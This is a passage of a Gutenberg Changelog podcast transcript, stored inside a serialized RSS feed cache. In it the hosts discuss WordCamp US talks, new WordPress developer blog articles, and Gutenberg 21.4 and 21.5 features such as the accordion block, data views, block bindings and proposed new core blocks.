Silverstein’s talk Unlock Developer Superpowers with AI is definitely worth a look on the rerun as he tested quite a few new tools and also gave a great rundown on his approach and how he works with it. </p>\n\n\n\n<p>So Adam is a former Googler and he is a core committer on the WordPress project. So yeah, he&#8217;s definitely out there ahead of, well, at least me. I don&#8217;t know about Sarah, but definitely ahead of me, so. And for nondevelopers, John Maeda’s talk was a fantastic introduction in how to think about AI in his cozy AI cooking talk as a keynote on the third day. And then if you want to be amazed of what&#8217;s happening in other areas outside of development, but in other areas of science, I highly recommend Professor Adam Gazzaley’s talk on the new era of experimental medicine, AI and the brain. And he talks about how his lab at the University of San Francisco did a lot of brain testing and figured out a way to replicate and have a feedback loop, a close feedback loop to reactions on certain things. So and what they actually did was they created a video game to help people with ADHD. And that&#8217;s for prescription, but also available for adults who are kind of having a bit of a cognitive decline in the later years and want to kind of keep a stop to that or at least delay it. So it&#8217;s really an interesting talk. Totally not related to WordPress at all. So yeah, have you watched any of those talks?</p>\n\n\n\n<p><em>Sarah Norris: </em>I haven&#8217;t this week. I&#8217;ve been concentrating on basically building the terms query block. But all three of these I really want to watch. They sound really good, especially that last one that sounds super interesting.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Yeah, yeah, the resources that he mentions in his slide deck and all that, you can really kind of go down that rabbit hole on a Sunday afternoon and kind of learn more about that. And then for block and block related talks, there were so many and each covering a different angle. I have a list in my Weekend Edition 38 that I would kind of where I said I would want to watch it and even if I&#8217;m not getting into the talk, I will keep a list of that for the reruns. But if I wanted also three of them is one is Michelle Hunt’s Building Experiences, Design systems, User experience and full site editing. And she really brings it home in talking about Atomic Design, which was a topic two years ago in San Diego or three years ago even, and then applying it to WordPress and themes and blocks and also creating a design system as well as guardrails for users. That&#8217;s her user experience piece that if you have too many options you confuse users and they don&#8217;t need them, but you can build guardrails around it and curate the experience quite well. </p>\n\n\n\n<p>Mary Ann Aschenbrenner is from a small agency and she talked about how she moved websites from classic theme to a block theme and what the steps were involved. And yeah, some decision making process there, really good. And then Block Composability the Past and the Future with Seth Rubenstein and Max Schmeling, and they talked about the remote data block coming out of WordPress VIP and they open sourced it, and that is how you can connect the Gutenberg editor with an outside data source like Google Spreadsheets or Airtable and bring that data in live. So when it changed the data on the other sites. Yeah, it&#8217;s updated the website and use block bindings and interactivity API to pull it all into a page and blocks that you can put on a page. So it&#8217;s really interesting what comes out of that this year in WordCamp US. So have you looked at the remote data block yet?</p>\n\n\n\n<p><em>Sarah Norris: </em>No, I haven&#8217;t, but that sounds amazing. It almost sounds like zapier but. But for. For the editor. Yeah, that sounds really cool.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Yeah, that was the idea about it, that you don&#8217;t have to create blocks for that. You kind of use that one block. Yeah, that has a lot of tools in there and then you can pull them in. It&#8217;s really interesting. So yeah, but of course everyone is at a different stage in their blocks journey, and it&#8217;s difficult to recommend a talk without knowing more about the needs but so I will share in the notes the link to all the talks of WordCamp US. I think right now they have two or three pages already uploaded so you can kind of look at them but don&#8217;t forget it and let times go past. It might also be something to put on your list for Christmas vacation days or Thanksgiving days instead of other things maybe. </p>\n\n\n\n<h3 class=\"wp-block-heading\">Community Contributions</h3>\n\n\n\n<p>So what&#8217;s community contributions? It seems there&#8217;s more new Momentum at the WordPress Developer Blog because apart from the What&#8217;s New for Developers by Justin Tadlock, there were four more articles published since we had our last Gutenberg Changelog recording, and two of them are by Justin Tadlock. </p>\n\n\n\n<p>One is a little controversial as a stated title, you don&#8217;t need Theme JSON for block theme styles. When you want to need or step away from using theme JSON for styling themes, this guide will walk you through the best practices of using style sheets instead. You will also learn from the article that Justin actually really likes theme JSON, but he wants to pick you up where you are and if you don&#8217;t don&#8217;t have a real good handle on it yet, you have alternatives and options. And the second one is in view of what&#8217;s coming to WordPress 6.9 is registering custom social icons for Gutenberg, and it&#8217;s a new filter hook that&#8217;s coming to the next release, and it&#8217;s learn how to use it to register your own services for social icons block. So his example is IMDb, that&#8217;s the movie database or Ko Fi, that&#8217;s buy me some coffee kind of donation place. I used it for my next edition of the Gutenberg Times theme where I want to have an archive page for my podcast, and I needed the icons for all the podcast directories where you can find the Gutenberg Changelog because only Spotify was on there, and there are so many others that are there, so. And Pocket Cast is already in there, but all the others are not. So I built them with that new tool for my new plugin. So it&#8217;s really interesting. So if you have other needs, you can do it yourself. You don&#8217;t need to wait for Core to put them in. </p>\n\n\n\n<p>And Troy Chaplin also he published a series on refactoring a multiblock plugin to build smarter register cleaner and scale easier. So if you have a multi block plugin, it&#8217;s kind of gives it a cleaner structure, support all block types and also a smarter registration and bundling of your assets. I think it&#8217;s a very good tutorial for the next stage of your plugins. And he also has a second post in the same realm is about implementing namespaces and coding standards in WordPress plugin development. This post got a lot of comments and suggestions from other people, co-developers and others. So it&#8217;s definitely worth looking into because namespacing, auto loading and linting for your multi block plugin is definitely something you want to find out or how to do this. So shout out for both authors for taking the time to put those tutorials together for other WordPress developers. And dear listeners, make sure you never miss another post of the developer block again. Subscribe to the blog. Anyway, I&#8217;m not asking you, I&#8217;m not putting on the spot when you&#8217;re gonna write for the developer blog. But yeah, think about it. We&#8217;re open to ideas.</p>\n\n\n\n<p><em>Sarah Norris: </em>I&#8217;ll have a think.</p>\n\n\n\n<p><em>Birgit Pauli-Haack:</em> Say again?</p>\n\n\n\n<p><em>Sarah Norris:</em> I&#8217;ll have a think.</p>\n\n\n\n<h3 class=\"wp-block-heading\">What’s Released &#8211; Gutenberg 21.4</h3>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Yeah, have a think. So, which brings us dear listeners to the Gutenberg releases in the last four weeks. We are starting with Gutenberg 21.4. Do you want to get us started, Sarah?</p>\n\n\n\n<p><em>Sarah Norris: </em>Yes. Yeah. Okay. Okay. What we&#8217;ve got first for 21.4. </p>\n\n\n\n<h3 class=\"wp-block-heading\">Enhancements</h3>\n\n\n\n<p>So in enhancements we&#8217;ve got a new server side render hook.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Yeah. And I&#8217;ve put some question marks on it because I need you to explain it to me a bit.</p>\n\n\n\n<p><em>Sarah Norris: </em>I mean, I&#8217;m not sure I can do that. So I think this is a. It&#8217;s a really nice refactoring job. So we had. Well, we still do have some data fetching logic in a server side render function and this has been refactored into a hook called useserverside Render, and it basically gives consumers more control over the block content when they&#8217;re using the server side rendering technique. I think we did have this functionality before, but this makes it much easier and more flexible for consumers to absorb the block content.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>All right, so when you say consumers, you mean extenders who use it in their block plugin, right?</p>\n\n\n\n<p><em>Sarah Norris: </em>Yes, yeah, that&#8217;s right.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Yeah. It&#8217;s not me as a consumer of Nutella or something.</p>\n\n\n\n<p><em>Sarah Norris: </em>Nutella Hook though, would be amazing.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>That&#8217;s a new blog.</p>\n\n\n\n<p><em>Sarah Norris: </em>Use Nutella.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Use the Teleservice. No. Oh, what a mess. So we have quite a few things that are concerning the data views. It gets a real good polish now and some great features in there. So the first thing is that there is a control command plus click for multiselection in the table layout. When you have data views in a table. So you can click all the rows that you want to use for bulk edits or something like that, which is really cool. It&#8217;s also a feature that is in the old WP admin. The second one is the data form select box to have custom empty options. This is actually really cool because then you have a no selection and it doesn&#8217;t disrupt anything of the workflow. Yeah, I got this all my life of web development and forms that when you have a dropdown you need an empty one. So if it&#8217;s not a required field. So they can unselect things.</p>\n\n\n\n<p><em>Sarah Norris: </em>Yeah, Very easily forgotten because how often do you actually build dropdowns as well? So every time you build one it&#8217;s good. Oh yeah, I need an empty option.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Yeah. It&#8217;s now built in to have a custom empty option if you want it. You want to do the next.</p>\n\n\n\n<p><em>Sarah Norris: </em>Yeah. What&#8217;s the next one? So I&#8217;ve got support group by in the table layout. So this, this is adding support for the table to be grouped by field, isn&#8217;t it? So it means that when you&#8217;re viewing a table, it can be grouped into separate sections and each section will have a heading. Yeah. But I guess depending on the content, it makes it much easier to consume that content and then. Yeah, each section has a table row with a heading. Yeah, that helps separate it out. Nice and neat.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Yeah, it makes it a little bit easier to find all the stuff that you need. The next one is that it&#8217;s now use responsive images for the dataview grid layout. So if you&#8217;re on a tablet, the images are smaller so you get more things on the screen as well as the mobile. You can use that in mobile as well.</p>\n\n\n\n<p><em>Sarah Norris: </em>Yeah, yeah. I didn&#8217;t know about this PR actually. It&#8217;s very, very cool because it&#8217;s. It allows you to to pass a maximum width to the images in the grid view. Because I think previously it was using the largest image or one of the largest image sizes. But that means like if there were a lot of images, this is saving like literal megabytes on every grid view. So that&#8217;s. It&#8217;s really, really cool. Good, Good pr. Good performance. PP.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Yeah, absolutely. Yeah.</p>\n\n\n\n<p><em>Sarah Norris: </em>Next one is allow data views empty state to be customized. Oh yeah. So this is if. So if you&#8217;re like loading a data views component, if there were no results previously, I think it just would render just a white screen basically, which is an empty data view component. But this allows you to pass in like a default empty state. So if you&#8217;re listing pages and no pages are part of the search results, then you can add something like a no pages found message. But it&#8217;ll be styled nicely and be centered and will look much better UX than a blank screen, basically.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Then nothing.</p>\n\n\n\n<p><em>Sarah Norris: </em>Yeah, yeah, then nothing.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Yeah. And I also like the. The last one is a data form is now a bootstrap validation for required and type checks on the input. And that&#8217;s right now for text input, email, integer and boolean field types. Boolean. Yeah, I never knows how to pronounce it. How do you pronounce it?</p>\n\n\n\n<p><em>Sarah Norris: </em>Boolean.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Boolean. Boolean. Boolean. Yeah. Other people say boolean. Anyway. Yeah, I really like that. So now you can have your data forms automatically kind of validated and at least for those types I think more is coming there as well. So yeah, if you use the data views for your plugins, you can actually have now good user input handling as well.</p>\n\n\n\n<p><em>Sarah Norris: </em>Next is the block library section and then we have the cover video block Add drag and drop support for poster uploads. So this is so for videos you can add a poster image for HTML videos. And this basically just allows drag and drop functionality. So we can drag these images into the poster section when you&#8217;re editing the cover video block basically makes it much easier to add a poster.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Yeah, yeah. Drag and drop is always fun most of the time. Yeah. And it&#8217;s not only for the video block, but it&#8217;s also for the cover block that has that video that&#8217;s also then pulled in. If there is not enough bandwidth on the page to show a poster instead of the video, and only when you click on it, the video kind of plays. And then we have updates to the file block. Two of them. One is to use the mime type to determine if a file is a PDF and the other one is have the nature of Feature detection for PDF support. So that would also give the PDF support means have it embedded on the page as an option or also have thumbnails and all that kind of thing. So yeah, those are kind of great enhancements.</p>\n\n\n\n<p><em>Sarah Norris:</em> Next up is the block editor section. So we have the list add keyboard shortcuts to indent, outdate, outdent. So this adds a keyboard shortcut to the tooltips. Why can&#8217;t I say tooltips? All these words that you don&#8217;t have to say out loud. And then you&#8217;re forcing me to say. When you hover over the block toolbar for the list block, you&#8217;ll now get some helpful tool tips that tell you about the indent and tab keyboard shortcuts. Basically.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Yeah, yeah, it&#8217;s been a while that it actually is the tab to indent on the list block. But it wasn&#8217;t really that widely known because it took a while to get it in there and now you can. On a single list item you can use the tab to indent it. But now you also know it by hovering over the tooltips or getting some tooltips. When you hover over the block toolbar, there is the icon to indent and outdent. And now it also has the tooltip for use the tab dummy kind of thing. All right. Oh, the write mode is also has quite some updates in the last few Gutenberg releases. This one also only has one that it adds the shuffle style to the write mode toolbar on a container block. So if you have a block, if there is a style variations for that particular block, you can you get this little color drop to select those style variations that is actually coming out of the zoom out mode that was already in 6.8.</p>\n\n\n\n<p><em>Sarah Norris: </em>Yeah, it&#8217;s very cool.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>It&#8217;s totally cool.</p>\n\n\n\n<p><em>Sarah Norris: </em>Yeah, it makes it really easy to. I know that&#8217;s the whole point of it, but it makes it very easy to switch between the styles. I think it&#8217;s something that we don&#8217;t really think about, especially when you&#8217;re building for the editor as well. But as soon as you see it in action, it&#8217;s just like, oh, this is unlocks loads of functionality just in one click. It&#8217;s very cool.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Yeah.</p>\n\n\n\n<p><em>Sarah Norris: </em>Next up is the component section. Got one in here as well. So this is the text control improve theming support. I think this is a little PR for making the border and placeholder colors themable for the text control component specifically. So it means that if you switch the theme, the border and the placeholder colors will also change as well as the other colors related to text control.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Yeah. And then there&#8217;s a block binding update on the date block. It now allows block binding, so yay. Now you can have the date block. There&#8217;s a date block or post date, for instance. Yeah, you can. Yeah, okay.</p>\n\n\n\n<p><em>Sarah Norris:</em> Exactly.</p>\n\n\n\n<p><em>Birgit Pauli-Haack:</em> Yeah, you can. Or recording date. Yeah, or something like that. You can connect it to a block binding and make it all follow all the date things in WordPress like location and localized formatting and all that. Block bindings also gets a little bit more wider usage. Opens up for wider usage during 6.9. I have not yet put a whole good research in there, but I&#8217;ve done some testing and it works really, really well also to. To add it to an audio block and all that.</p>\n\n\n\n<p><em>Sarah Norris: </em>I can tell you one thing, although it will probably be for Gutenberg changelog 21.6 or 121, but I&#8217;ve been using block bindings. I&#8217;ve been using block bindings for the terms query block as well. And it was unbelievably easy to implement. Just like so much kudos to the people who&#8217;ve been working on block bindings. So I&#8217;ve used it to expose term data so we can absorb that in the new blocks for the terms. And it&#8217;s just. I don&#8217;t know, I&#8217;m just blown away by it really. It just makes so much sense. Makes everything so much more flexible.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Yeah, I use the block bindings too. I registered a separate source for the block bindings for my podcast archive page. Yeah. Because I wanted recording date and stuff, the podcast description and the logo as well as for every episode recording date and the download link just in there in the query loop. And it really worked. Yeah. The audio blog. I&#8217;m still debugging it because of course it&#8217;s all my fault. But it really works well and I&#8217;m so happy that I don&#8217;t have to write new blocks. And I can use a plugin that creates all those fields and has their own template, but the templates are not for block themes. So I can create my own template and add all those blocks bindings and put it into a plugin. So it&#8217;s really cool.</p>\n\n\n\n<p><em>Sarah Norris: </em>Yeah.</p>\n\n\n\n<p><em>Birgit Pauli-Haack:</em> So many more options opening up with block bindings.</p>\n\n\n\n<p><em>Sarah Norris: </em>Yeah. What&#8217;s our next section now?</p>\n\n\n\n<h3 class=\"wp-block-heading\">Documentation</h3>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>So I scroll down to the documentation section of the changelog and I just wanted to point out two things. One is that the Playground CLI is now preferred over the WP now when you use it on any of your projects for playground to have a local development. So it&#8217;s really cool if you&#8217;re developing a plugin, but not in the realm of a website, just on a separate folder. And then you can do playground CLI and then it opens up a WordPress instance right from that and knows it&#8217;s coming from a plugin. So it puts all the stuff from right in there into the playground. It installs it and activates it. And really fast development. Now that was previous was WP now and now it&#8217;s the Playground CLI and it&#8217;s documented. And the second one was the document guidelines on how to get new social icons into Core and have the link to the developer blog article by Justin Tadlock on how to do it yourself. What else? I think that I have the feeling we are now at the end of Gutenberg 21.4.</p>\n\n\n\n<p><em>Sarah Norris: </em></p>\n\n\n\n<p>Yes, success.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>And we are coming to Gutenberg 21.5. Do you want to start again?</p>\n\n\n\n<h3 class=\"wp-block-heading\">Gutenberg 21.5</h3>\n\n\n\n<p><em>Sarah Norris: </em>Yes, I can do. Yeah. </p>\n\n\n\n<h3 class=\"wp-block-heading\">Enhancements</h3>\n\n\n\n<p>Starting at enhancements again. So first up is Data Form. Panel layout can open as dropdown or modal. So I think this is adding the. The modal panel type to the data form. And yeah, it basically means that a panel can be opened as a modal, making the data form more flexible.</p>\n\n\n\n<p><em>Birgit Pauli-Haack:</em> Yes, indeed. Yeah. And then the data views also get an additional enhancement as the option is now added to allow Infinite Scroll. On Data Views, you can decide between pagination or infinite scroll like we have in the media library. There&#8217;s an Infinite Scroll Infinite scroll kind of way. So yeah, it kind of opens up a lot more possibilities for Core or plugin developers to use that.</p>\n\n\n\n<p><em>Sarah Norris: </em>Next up is the block library section. First up is the query title, adding a post type label variation. So this adds a post type label to the query title block, which displays the singular name of the query post type.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Yeah. So you know, when you look at it, oh, this is a recipe or this is a post or this is a page. When it kind of comes into the query loop, that&#8217;s definitely helpful, kind of prevents confusion. Definitely, yeah. And then of course we come to your accordion block.</p>\n\n\n\n<p><em>Sarah Norris:</em> Yes.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Is it still experimental or has it been removed? Experimental.</p>\n\n\n\n<p><em>Sarah Norris: </em>It&#8217;s still experimental at the moment. So it&#8217;s only just been merged. Yeah. So we&#8217;re still testing. So the best thing about blocks being experimental is that we can make breaking changes, essentially. So I think it will be experimental until hopefully not the last minute. But, you know, the last minute being the last few weeks, probably before 6.9. But I think I&#8217;m feeling really confident about the block in general. So hopefully just after a few rounds of testing, maybe some tweaks being made. There&#8217;s already been a bunch of. A bunch of PRs opened for some small tweaks as well, which is really nice to see. So, yeah, hopefully it&#8217;ll be. It&#8217;ll be stabilized by 6.9. That&#8217;d be great.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Yeah. Yeah, I hope, I hope so very much though. Yeah. So the accordion block is. It&#8217;s implementing the HTML standard kind of way and then how it kind of works with blocks and you have a whole panel and then you have additional accordion. You have an accordions. It&#8217;s not a accordions block, but it&#8217;s a whole accordion. And then the accordion items, and then you have inner blocks that can house any content in the accordion item panels, right?</p>\n\n\n\n<p><em>Sarah Norris: </em>Yeah, that&#8217;s right. I think that&#8217;s where I got stuck as well, because I was like, this is multiple accordions. No, it&#8217;s one accordion and then the accordion is made up of multiple sections. Yeah. And then we have to have accordion content and then the accordion header and accordion panel. And within the panel you can add. I think it&#8217;s. I think it&#8217;s all blocks. I should know, shouldn&#8217;t I? But yeah, you can add any, any content within that panel. It just makes it a little bit more flexible than the details block. But I know that the accordion and the details block are very, very similar also at the moment. I think the details block will be surfaced if you search for accordion as well in the block editor. My plan, in my head at the moment, I probably need to write this down somewhere, is that once the accordion block, the new block is stabilized, then we could remove that accordion keyword from the details block. So both of those are two very obvious distinct blocks. </p>\n\n\n\n<p>Hopefully reduce some confusion. I think the main issue is with the details uses a summary element and I don&#8217;t think it&#8217;s semantically correct to add headings, but maybe a bunch of other stuff as well. Basically you can only really technically add text content, which doesn&#8217;t make it very flexible. And then the accordion block will have, at the moment only has an option for one type of icon. But the idea is that we&#8217;re going to add a lot more customization to the icon and making the header content itself more flexible. So yeah, hopefully this accordion block is much more flexible and just it&#8217;s kind of like an advanced block compared to the details. And I think, I think they can both exist fine. They&#8217;re both, they&#8217;re both HTML paradigms. They can both exist as blocks as well. And you know, more blocks. We need more blocks.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>More blocks, yes, definitely. Yeah, yeah. There were also some you you weren&#8217;t able in the details block, you were also not able to. To style the summary separately from the details. So if you put a border around you, it almost was on the same on the whole thing and not on the single. On the details. Yeah, or if you want to have a text styling on the summary, it also would bleed through the details. So yeah, but that&#8217;s wanted I think the details and summary that comes also from Markdown which so you could use it on GitHub and all that and there it really can have additional styling. So the accordion block is definitely for much richer styling and designs available. So are you thinking about handling transforms from details to accordions?</p>\n\n\n\n<p><em>Sarah Norris: </em>I haven&#8217;t thought of that yet, but that makes perfect sense because I imagine. Well, this is only a guess, but I imagine some people have. Users have been using the details block for probably what they would have wanted to use an accordion block for like if they wanted additional styling or for like more advanced FAQ sections and stuff like that. So yes, I imagine that will be a want transforming from a details block to the accordion. So yeah, I&#8217;ll add it to the list.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Write it down. All right, the next one is again it&#8217;s on the component section and there are a few in there. But I just wanted to point out the forms component that it also now supports an async validation. It means that you can also do server side validation and supports that with a. It&#8217;s a breaking change for this. It&#8217;s a private component so we shouldn&#8217;t even talk about that. Okay, so I didn&#8217;t see that but it&#8217;s. Yeah, it has an async story. So you can have an async validation. Yes, maybe sooner or later we get the public, but yeah, we&#8217;ll see.</p>\n\n\n\n<p><em>Sarah Norris: </em>For themes, there is additional support for providing the border radius presets. So yeah, if you&#8217;re familiar with other presets that you can have in theme JSON for styling, this is one for Border Radius allows you to set border radius presets and then they&#8217;re available in the different controls and it also uses the spacing sizes is like a modal for the way the presets use as well.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Yeah, if you are a themer, you definitely want to control the border radius and have users use just the certain numbers for it. Yeah, so if you use a smaller one then it&#8217;s always 15, and it&#8217;s not one is 12 and the other one is 17 or something like that. And then if you want a bigger radius for 25 or something like you don&#8217;t want to kind of that users put in all above 20, so to speak. So you have. You have a more consistent design on your site. And even if you kind of let the users use Border Radius for certain things for designing the next one is. Well, I think. Well, just want to say that the presets for Border Radius is definitely a big thing for theme developers. Yeah, I really get that. </p>\n\n\n\n<p>The next one is actually a really big thing for anybody who uses WordPress because the command palette comes to the admin dashboard. So you can actually be anywhere in your WordPress admin and then say open Site editor or add page or open style book or something like that. So you don&#8217;t have to find the menu. Click 15 times through the menu to find that particular piece there. Or say add CSS. I don&#8217;t know if that&#8217;s a command yet, but it definitely should be. So it&#8217;s a much easier way. And a lot of people might actually appreciate that they can do shortcuts pretty much to get to wherever they need to do. For the power users, it&#8217;s definitely an improvement. And I also can see there is. In the roadmap, there was also. That&#8217;s actually part of the roadmap that the command palette is available for the admin dashboard. But it&#8217;s also a foundational piece to get also AI using some of the commands and also to add. To have plugin use add commands to it that are not connected to the site editor. So plugin developers actually can streamline their processes as well for their users. Yeah, it&#8217;s nice. Yeah, it&#8217;s cool. Yeah. And I think now we have. Yeah, there&#8217;s a media for you. Do you want to go.</p>\n\n\n\n<p><em>Sarah Norris: </em>I can do for the block library, the median text block. So this is retain use featured image hook value during transformations. So I think this is a bug fix that fixes the media and text transformations to and from a cover block. Basically ensures that the use featured image value is retained during the transformation, which is very important. Don&#8217;t want to be resetting.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: It&#8217;s very important. And kind of adds. Removes an additional step people have to think about. So I already did this. Why do I have to do it again?</p>\n\n\n\n<p><em>Sarah Norris: </em>Yeah, exactly.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>After they migrated. We are at the end of Gutenberg 21.5. Yes, we did it, Sarah. </p>\n\n\n\n<h3 class=\"wp-block-heading\">What’s in Active Development or Discussed</h3>\n\n\n\n<p>Now we have one section left in our podcast that&#8217;s the what&#8217;s in active development or discussed. And as I said in the intro we need more blocks. </p>\n\n\n\n<h3 class=\"wp-block-heading\">More Blocks</h3>\n\n\n\n<p>Matias Ventura, lead architect of Gutenberg and the whole revamping of the admin design, he posted an issue called New Blocks Editions for the Block Library. And there&#8217;s a lot of discussions that we would need there if we need them or not need them. But he comes from a point where he says, okay, for theme to have a good create a good experience for their users, it would be helpful to have these kinds of blocks or some, some of them or all of them in there. So there is no doubt that when a theme styles a block or uses it in patterns or in template parts or something like that, that it&#8217;s not going to be there. And that&#8217;s the experience now that if users use some other block, a theme that assumes there are blocks in there, they get a very confusing message there that so and so block wasn&#8217;t installed if they want to install it or something like that. And I think that&#8217;s for any new user of the WordPress could work inside editor are not very helpful. And so there are some suggested blocks there. Amongst them, the icons block, the playlist block, the slider, slider or carousel block, a stretchy text block, tabs block, accordion block. We have that Mega menus, math ML block, marquee block, table of content, time to read breadcrumbs and dialogue block. That&#8217;s kind of the list. I think it can go on and on and on, but I think it&#8217;s a good list there. I felt I&#8217;m a little bit okay, the marquee block. Didn&#8217;t we outphase that in the, in the 90s already? But I think it comes in handy when you have a news sticker across the top or something like that. MathML I think it&#8217;s a good block for educational sites, especially in math education. So I don&#8217;t know if that needs to be in the core or it can still be a plugin. Actually, Adam Silverstein created a plugin with the MathML block or the breadcrumbs block. Definitely important because that&#8217;s so important that we can help people find their way back. So a lot of people chime in. Aaron Jorban, Mike McAllister, Jeff Paul, Rich Tabor, Joe Dalston, Hendrik Larsen, Jeff Chandler yeah, a lot of people kind of join me in.</p>\n\n\n\n<p><em>Sarah Norris: </em>Yeah, it&#8217;s great to see.</p>\n\n\n\n<p><em>Birgit Pauli-Haack:</em> What do you think?</p>\n\n\n\n<p><em>Sarah Norris:</em> It&#8217;s great to see so much interaction and conversation about new blocks. I think generally most people think that we should have more blocks, but I think the contention comes down to per block and which one should be added. And I think that&#8217;s fine. I think that it&#8217;s fine to have a discussion per block about that. But at the moment I think the lack of blocks just limits the flexibility and design opportunities in the editor. So that&#8217;s where maybe the decision process is a little bit easier for things like the accordion block, because it&#8217;s such an obvious design choice and option to have. Similar to the tabs block, probably the carousel block icons. But then there&#8217;s others like you mentioned about MathML maybe would have less users, but that doesn&#8217;t mean it shouldn&#8217;t be in core. It&#8217;s probably just a longer conversation or maybe it doesn&#8217;t make it into core. I&#8217;m not sure how I feel about the marquee block because I think it&#8217;d be really fun to have a marquee block. But I also understand that maybe, you know, not. Not everyone would want to use it. So maybe it doesn&#8217;t warrant going in. But then it&#8217;s fun, isn&#8217;t it?</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>So, yeah, there&#8217;s fun.</p>\n\n\n\n<p><em>Sarah Norris: </em>I don&#8217;t know.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>I have also seen that there&#8217;s a developers and user usability. People don&#8217;t like sliders and carousels.</p>\n\n\n\n<p><em>Sarah Norris: </em>Right.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>But users or site owners like them very much. Yeah, exactly. So I talked with a few and at WordCamp US I talked with a few agency owners, said, yeah, that&#8217;s one of the blocks that we built ourselves because we need it on every single project that we are doing. Yeah. I can&#8217;t keep them kind of say, okay, there are alternatives when they want it. You know, our customers want them and so we build them.</p>\n\n\n\n<p><em>Sarah Norris: </em>Yeah.</p>\n\n\n\n<p><em>Birgit Pauli-Haack:</em> And they&#8217;re pretty good to. They&#8217;re pretty navigational things, so interactive things. So if the site has no activity at all, this is actually getting you back.</p>\n\n\n\n<p><em>Sarah Norris:</em> Yeah, exactly. And so many of these blocks listed in this issue that Matias opened, so many of them already have so much work. They already have a PR or. And they&#8217;ve probably just stalled the same question of how do we do this? Why should we do this? Do we need this block? So I think it&#8217;s just a case of going through each block and having that conversation. Because the accordion block, I only picked it up and finished it. Jeff had done. Already done so much good work on that and that&#8217;s why it was able to be landed so quickly and yeah. In a similar position with many of the others. So, yeah, I&#8217;m looking forward to that.</p>\n\n\n\n<p><em>Birgit Pauli-Haack: </em>Yeah. I think the table of contents has received quite a few iterations.</p>\n\n\n\n<p><em>Sarah Norris:</em> Yeah.</p>\n\n\n\n<p><em>Birgit Pauli-Haack:</em> And just a few pieces missing that would make it a little bit more a little easier to handle, but we all kind of found our ways around it. But for that, we always have to install Gutenbergs to have the blocks there. And not everyone wants to use Gutenberg in production. Yeah, still. </p>\n\n\n\n<p>All right. Okay. So we are coming to the end of our Gutenberg Changelog podcast. As always, the show notes will be published on GutenbergTimes.com podcast and if you have questions, suggestions, or news that you want us to include, send them to <a href=\"http://changelogutenbergtimes.com\">changelogutenbergtimes.com</a> that&#8217;s <a href=\"http://changelogutenburgtimes.com\">changelogutenburgtimes.com</a> Thank you so much, Sarah, for being here, and thank you to all the listeners for listening. And if you want to review our podcast on several of those directories, like on Apple or on Spotify, please do, as it helps other people to discover it. So thank you for listening, and goodbye and see you at the next one.</p>\n\n\n\n<p><em>Sarah Norris:</em> Bye.</p>\n\n\n\n<p><em>Birgit Pauli-Haack:</em> Bye.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 06 Sep 2025 12:03:49 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Gutenberg Changelog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:38;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"Gutenberg Times: Accordion Block, Automattic Telex, Playground CLI and more—Weekend Edition 